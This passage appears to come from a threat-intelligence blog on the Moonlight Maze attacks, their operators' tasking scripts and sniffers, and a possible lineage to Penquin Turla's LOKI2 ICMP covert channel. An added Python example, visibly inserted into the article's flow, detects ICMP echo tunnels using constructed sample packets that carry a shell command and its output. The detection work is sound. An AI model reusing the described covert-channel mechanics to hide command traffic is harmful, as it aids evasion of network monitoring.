The attackers were prolific Unix users. They used their skills to script their attack phases, which allowed a sort of old school automation. Rather than have the malware communicate with command-and-control servers and carry out functions and exfiltration of its own accord, the attackers would manually log in to victim nodes and leverage scripts and tasking files (usually located in the /var/tmp/ directory) to instruct all of these nodes on what they should do, what information to collect, and finally where to send it. This allowed them to orchestrate large swaths of infected machines despite it being an ‘operator-at-keyboard’ style of attack.
The operators were learning as they went. Our analysis of the binaries shows a trial-and-error approach to malware development. Many binaries were simply open-source exploits leveraged as needed; others were open-source backdoors and sniffers. However, despite the lack of exact compilation timestamps (which a Windows PE header would carry), it is possible to trace a binary evolution of sorts. The developers would test out new capabilities, then recompile binaries to fix issues and expand functionality as needed. This allowed us to graph a sort of binary tree of development and see how the attack's functionality developed throughout this campaign.
Despite their early interest in OpSec, and their use of tools specifically designed for that purpose, the operators made a huge mistake. It was their standard behavior to use infected machines to look for further victims on the same network or to relay onto other networks altogether. In more than a dozen cases, the attackers had infected a machine with a sniffer that collected all activity on the victim machine and then proceeded to use that machine to connect to other victims. That meant the attackers created near-complete logs of everything they themselves did on these systems, and once they performed their routine exfiltration, those self-logs were saved on the HRTest node for posterity. The attackers created their own digital footprint in perpetuity.
So what’s the verdict?
A complete analysis of the attack artefacts is provided in the whitepaper, for those interested in a look under the hood of a portion of the Moonlight Maze attacks. For those who would like to jump straight to the conclusion: our parallel investigation into the connection between Moonlight Maze and Turla yielded a more nuanced answer predicated upon the limitations in our visibility.
An objective view of the investigation would have to admit that a conclusion is simply premature. The unprecedented public visibility into the Moonlight Maze attack provided by David Hedges is fascinating, but far from complete. It spans a window from 1998 to 1999, plus samples apparently compiled as far back as late 1996. On the other hand, the Penquin Turla codebase appears to have been primarily developed from 1999 to 2004 before being leveraged in more modern attacks. What we are left with is a circumstantial argument that takes into account the binary evolution witnessed from 1998 to 1999 as well as the functionality and tools leveraged at that time, both of which point to a development trend that could lead directly to what is now known as Penquin Turla. This includes the use of tasking files, LOKI2 for covert-channel communications, and promiscuous sniffers, all of which made it into the modern Penquin Turla variants.
The next step in our ongoing parallel investigation would have to focus on a little-known operation codenamed ‘Storm Cloud’. This codename represents the evolved toolkit leveraged by the same Moonlight Maze operators once the initial intrusions became public in 1999. In 2003, the story of Storm Cloud leaked with little fanfare, but a few prescient details led us to believe that a more definitive answer may be found in this intrusion set:
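Since the LOKI2-style covert channel is described as still in use, the check a defender wants is whether ICMP echo traffic on the wire is carrying more than ping. LOKI2 hides its data in the payload of ICMP echo request and reply packets, so the example below, added here and not taken from Kaspersky's writeup or from LOKI2's source, applies two heuristics to a packet sequence: an echo request whose payload does not match the fixed pattern a stock ping client sends (the Windows alphabet string, or iputils' timeval followed by counting bytes), and an echo reply whose payload differs from the request it answers, which RFC 792 forbids and which a tunnel endpoint returning command output cannot avoid. The packets are constructed in-script (IP checksum left zero); the pattern list and alert names are this example's own.

```python
"""
Added example, not code from the Kaspersky writeup or from LOKI2: two checks for an ICMP
echo covert channel.  Check 1: does an echo request payload look like a stock ping?
Check 2: does an echo reply echo its request exactly (RFC 792), or carry different data?
All packets below are constructed in-script.
"""
import math
import struct

ICMP_ECHO_REPLY, ICMP_ECHO = 0, 8
WINDOWS_PING_PAYLOAD = b"abcdefghijklmnopqrstuvwabcdefghi"   # Windows ping.exe, 32 bytes


def icmp_checksum(data):
    """RFC 1071 one's-complement sum over ICMP header + payload (zero-padded if odd)."""
    if len(data) % 2:
        data += b"\0"
    total = sum(struct.unpack("!%dH" % (len(data) // 2), data))
    total = (total >> 16) + (total & 0xFFFF)
    total += total >> 16
    return (~total) & 0xFFFF


def build_echo(kind, ident, seq, payload, src, dst):
    """Constructed IPv4 (no options, IP checksum left zero) + ICMP echo packet for the demo."""
    icmp = struct.pack("!BBHHH", kind, 0, 0, ident, seq) + payload
    icmp = icmp[:2] + struct.pack("!H", icmp_checksum(icmp)) + icmp[4:]
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(icmp), 0x1234, 0, 64, 1, 0, src, dst)
    return ip + icmp


def parse_echo(pkt):
    """Dict for an IPv4 ICMP echo/echo-reply packet, None for anything else."""
    if len(pkt) < 20 or pkt[0] >> 4 != 4:
        return None
    ihl = (pkt[0] & 0x0F) * 4
    if pkt[9] != 1 or len(pkt) < ihl + 8:          # protocol 1 = ICMP
        return None
    kind, _code, _csum, ident, seq = struct.unpack_from("!BBHHH", pkt, ihl)
    if kind not in (ICMP_ECHO, ICMP_ECHO_REPLY):
        return None
    return {"type": kind, "id": ident, "seq": seq, "src": pkt[12:16], "dst": pkt[16:20],
            "payload": pkt[ihl + 8:], "csum_ok": icmp_checksum(pkt[ihl:]) == 0}


def entropy(data):
    """Shannon entropy in bits per byte; separates plaintext commands from encrypted tunnel data."""
    if not data:
        return 0.0
    counts = [data.count(b) for b in set(data)]
    return -sum(c / len(data) * math.log2(c / len(data)) for c in counts)


def classify_payload(p):
    """'windows-ping', 'linux-ping' (iputils: struct timeval of 8 or 16 bytes, then bytes
    counting up from the timeval length, e.g. 0x10..0x37 for the default 56 bytes), or 'unknown'."""
    if p == WINDOWS_PING_PAYLOAD:
        return "windows-ping"
    for ts_len in (8, 16):
        if len(p) > ts_len and p[ts_len:] == bytes(i & 0xFF for i in range(ts_len, len(p))):
            return "linux-ping"
    return "unknown"


def analyze(packets):
    """Return alert dicts for a packet sequence; requests are matched to replies by
    (addresses, id, seq) so a reply that changes the payload is caught."""
    alerts, pending = [], {}
    for pkt in packets:
        e = parse_echo(pkt)
        if e is None:
            continue
        if e["type"] == ICMP_ECHO:
            pending[(e["src"], e["dst"], e["id"], e["seq"])] = e["payload"]
            if classify_payload(e["payload"]) == "unknown":
                alerts.append({"reason": "nonstandard-echo-payload", "id": e["id"],
                               "seq": e["seq"], "entropy": round(entropy(e["payload"]), 2)})
        else:
            req = pending.pop((e["dst"], e["src"], e["id"], e["seq"]), None)
            if req is None:
                alerts.append({"reason": "unsolicited-echo-reply", "id": e["id"], "seq": e["seq"]})
            elif req != e["payload"]:
                alerts.append({"reason": "reply-payload-mismatch", "id": e["id"], "seq": e["seq"]})
    return alerts


# --- constructed traffic: one benign Linux ping exchange, one tunnel-style exchange -----
A, B = b"\x0a\x00\x00\x01", b"\x0a\x00\x00\x02"
LINUX_PAYLOAD = bytes(16) + bytes(range(16, 56))              # zeroed timeval for the demo
SAMPLE_PACKETS = [
    build_echo(ICMP_ECHO, 0x1A2B, 1, LINUX_PAYLOAD, A, B),
    build_echo(ICMP_ECHO_REPLY, 0x1A2B, 1, LINUX_PAYLOAD, B, A),
    build_echo(ICMP_ECHO, 0x5555, 7, b"ls /var/tmp\n", A, B),            # command in request
    build_echo(ICMP_ECHO_REPLY, 0x5555, 7, b"task.sh\nsniff.out\n", B, A),  # output in reply
]

if __name__ == "__main__":
    for alert in analyze(SAMPLE_PACKETS):
        print(alert)
```

The reply-mismatch check is the more robust of the two: an operator can make the request side mimic a stock ping, but a server that answers with data cannot also echo the request byte for byte, so the pairing of request and reply is where the channel shows. The pattern list is deliberately small; other ping implementations need their own entries before the first heuristic is used for alerting rather than triage.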
Storm Cloud reference in a 2003 Wall Street Journal Article mentions further use of LOKI2
Just as the SAS 2016 talk enabled us to find David and his time capsule of Moonlight Maze artefacts, we hope this glimpse into our ongoing research will bring another dedicated sysadmin out of the woodwork who may still have access to Storm Cloud artefacts, allowing us to settle this question once and for all. Beyond the historical value of this understanding, it would afford greater perspective into a tool being leveraged in cyberespionage attacks to this day.